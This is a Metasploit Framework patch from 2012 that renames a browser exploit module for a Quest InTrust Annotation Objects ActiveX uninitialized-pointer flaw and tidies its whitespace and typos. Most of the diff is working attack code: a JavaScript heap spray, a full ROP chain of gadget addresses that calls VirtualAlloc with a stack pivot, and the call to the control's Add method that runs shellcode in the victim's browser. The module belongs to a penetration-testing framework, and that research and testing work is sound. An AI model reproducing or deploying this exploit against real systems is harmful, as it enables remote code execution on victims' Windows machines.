From 0d739a1a51a85d35a543333b46fbd64dfdac33b0 Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Thu, 12 Apr 2012 01:30:01 -0500
Subject: [PATCH] Module rename.  Cleanup whitespace.  Fix typos.

---
 ...ointer_rce.rb => intrust_annotatex_add.rb} | 109 +++++++++---------
 1 file changed, 54 insertions(+), 55 deletions(-)
 rename modules/exploits/windows/browser/{annotation_objects_uninitialized_pointer_rce.rb => intrust_annotatex_add.rb} (69%)

diff --git a/modules/exploits/windows/browser/annotation_objects_uninitialized_pointer_rce.rb b/modules/exploits/windows/browser/intrust_annotatex_add.rb
similarity index 69%
rename from modules/exploits/windows/browser/annotation_objects_uninitialized_pointer_rce.rb
rename to modules/exploits/windows/browser/intrust_annotatex_add.rb
index 05cb4f76ba..ccf6ca7a1b 100644
--- a/modules/exploits/windows/browser/annotation_objects_uninitialized_pointer_rce.rb
+++ b/modules/exploits/windows/browser/intrust_annotatex_add.rb
@@ -1,12 +1,8 @@
-##
-# $Id$
-##
-
 ###
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+#   http://metasploit.com/framework/
 ##
 
 require 'msf/core'
@@ -18,32 +14,31 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super( update_info(info,
-			'Name'           => 'Quest InTrust Annotation Objects uninitialized pointer remote code execution',
+			'Name'           => 'Quest InTrust Annotation Objects Uninitialized Pointer',
 			'Description'    => %q{
-					This module exploits a uninitialized variable vulnerability in the 
+					This module exploits an uninitialized variable vulnerability in the
 				Annotation Objects ActiveX component. The activeX component loads into memory without
-				opting into ALSR so this module exploits the vulnerability against windows Vista and 
-				Windows 7 targets. A large heap spray is required to fulfil the requirement that EAX 
-				points to part of the rop chain in a heap chunk and the calculated call will hit the 
-				pivot in a seperate heap chunk. This will take some time in the users browser.
+				opting into ALSR so this module exploits the vulnerability against windows Vista and
+				Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX
+				points to part of the ROP chain in a heap chunk and the calculated call will hit the
+				pivot in a separate heap chunk. This will take some time in the users browser.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
-					'rgod <rgod[at]autistici.org>',	# initial discovery & poc
-					'mr_me <steventhomasseeley[at]gmail.com>',	# msf module
+					'rgod <rgod[at]autistici.org>',             # initial discovery & poc
+					'mr_me <steventhomasseeley[at]gmail.com>'   # msf module
 				],
-			'Version'        => '$Revision$',
 			'References'     =>
 				[
 					[ 'OSVDB', '80662'],
 					[ 'BID', '52765'],
-					[ 'URL', 'http://www.exploit-db.com/exploits/18674/'],
+					[ 'URL', 'http://www.exploit-db.com/exploits/18674/']
 				],
 			'DefaultOptions' =>
 				{
 					'EXITFUNC' => 'process',
-					'InitialAutoRunScript' => 'migrate -f',
+					'InitialAutoRunScript' => 'migrate -f'
 				},
 			'Payload'        =>
 				{
@@ -114,8 +109,6 @@ class Metasploit3 < Msf::Exploit::Remote
 			end
 		end
 
-		print_status("Target selected: #{my_target.name}") if datastore['VERBOSE']
-
 		# Re-generate the payload.
 		return if ((p = regenerate_payload(cli)) == nil)
 
@@ -141,10 +134,11 @@ class Metasploit3 < Msf::Exploit::Remote
 				memory = new Array();
 				for (i=0;i<1000;i++){ memory[i] = block+shellcode; }
 			}
+
 			function main(){
 				heapspray();
   				#{obj_name}.Add(#{my_target.ret},1);
-			}			
+			}
 			EOS
 
 		end
@@ -156,39 +150,39 @@ class Metasploit3 < Msf::Exploit::Remote
 				junk,
 				junk,
 				junk,
-				0x44014075				# xchg eax,esp ; add [ecx],10 ; retn 8 (pivot)
-			].pack('V*') 
+				0x44014075  # xchg eax,esp ; add [ecx],10 ; retn 8 (pivot)
+			].pack('V*')
 
 			rop_gadgets << [0x44015CEF].pack('V*') * 140	# padding of retn's
 
 			rop_gadgets << [
-				0x44015CEF,				# retn
-				0x44015CEF,				# retn
-				0x44015CEF,				# retn
-				0x44015cee,				# pop edx ; retn
-				0x4401a130,				# ptr to &VirtualAlloc() (IAT)
-				0x44015ca4,				# mov eax,[edx+4] ; retn
-				0x44001218,				# push eax ; dec eax ; pop esi ; pop ebp ; retn 14
-				junk,				# filler (compensate)
-				0x440159bb,				# pop ebp ; retn
-				junk,				# filler (retn offset compensation)
-				junk,				# filler (retn offset compensation)
-				junk,				# filler (retn offset compensation)
-				junk,				# filler (retn offset compensation)
-				0x4400238A,				# filler (pop edi ; pop esi ; pop ebp ; retn)
-				0x440012c1,				# push esp ; ret 08
-				0x44016264,				# pop ebx ; retn
-				0x00004000,				# 0x00000001-> ebx
-				0x44015cc9,				# pop edx ; retn
-				0x00001000,				# 0x00001000-> edx
-				0x44017664,				# pop ecx ; retn
-				0x00000040,				# 0x00000040-> ecx
-				0x44017bd8,				# pop edi ; retn
-				0x44017ebe,				# retn
-				0x4400bf25,				# pop eax ; retn
-				0x0C0C2478,				# pointer+0x0c to pop edi ; pop esi ; pop ebp ; retn
-				0x44005C57,				# pushad ; push 8 ; push ecx; push esi; call [eax+c]
-				0x90909090,				# nops, do not change as it changes the offset
+				0x44015CEF,  # retn
+				0x44015CEF,  # retn
+				0x44015CEF,  # retn
+				0x44015cee,  # pop edx ; retn
+				0x4401a130,  # ptr to &VirtualAlloc() (IAT)
+				0x44015ca4,  # mov eax,[edx+4] ; retn
+				0x44001218,  # push eax ; dec eax ; pop esi ; pop ebp ; retn 14
+				junk,        # filler (compensate)
+				0x440159bb,  # pop ebp ; retn
+				junk,        # filler (retn offset compensation)
+				junk,        # filler (retn offset compensation)
+				junk,        # filler (retn offset compensation)
+				junk,        # filler (retn offset compensation)
+				0x4400238A,  # filler (pop edi ; pop esi ; pop ebp ; retn)
+				0x440012c1,  # push esp ; ret 08
+				0x44016264,  # pop ebx ; retn
+				0x00004000,  # 0x00000001-> ebx
+				0x44015cc9,  # pop edx ; retn
+				0x00001000,  # 0x00001000-> edx
+				0x44017664,  # pop ecx ; retn
+				0x00000040,  # 0x00000040-> ecx
+				0x44017bd8,  # pop edi ; retn
+				0x44017ebe,  # retn
+				0x4400bf25,  # pop eax ; retn
+				0x0C0C2478,  # pointer+0x0c to pop edi ; pop esi ; pop ebp ; retn
+				0x44005C57,  # pushad ; push 8 ; push ecx; push esi; call [eax+c]
+				0x90909090,  # nops, do not change as it changes the offset
 				0x90909090,
 				0x90909090,
 				0x90909090,
@@ -211,15 +205,19 @@ class Metasploit3 < Msf::Exploit::Remote
 				var data = payload;
 				while(data.length < 100000) { data += data; }
 				var onemeg = data.substr(0, 64*1024/2);
-    				for (i=0; i<14; i++) {
-        				onemeg += data.substr(0, 64*1024/2);
-    				}	
+
+				for (i=0; i<14; i++) {
+					onemeg += data.substr(0, 64*1024/2);
+				}
+
 				onemeg += data.substr(0, (64*1024/2)-(38/2));
 				var block = new Array();
-    				for (i=0; i<700; i++) {
-        				block[i] = onemeg.substr(0, onemeg.length);
-    				}
+
+				for (i=0; i<700; i++) {
+					block[i] = onemeg.substr(0, onemeg.length);
+    			}
 			}
+
 			function main(){
 				heapspray();
 				#{obj_name}.Add(#{my_target.ret},1);
@@ -245,7 +243,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		</html>
 		EOF
 
-		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+		peer = "#{cli.peerhost.ljust(16)} #{self.shortname}"
+		print_status("#{peer} Sending HTML...")
 
 		#Remove the extra tabs from content
 		content = content.gsub(/^\t\t/, '')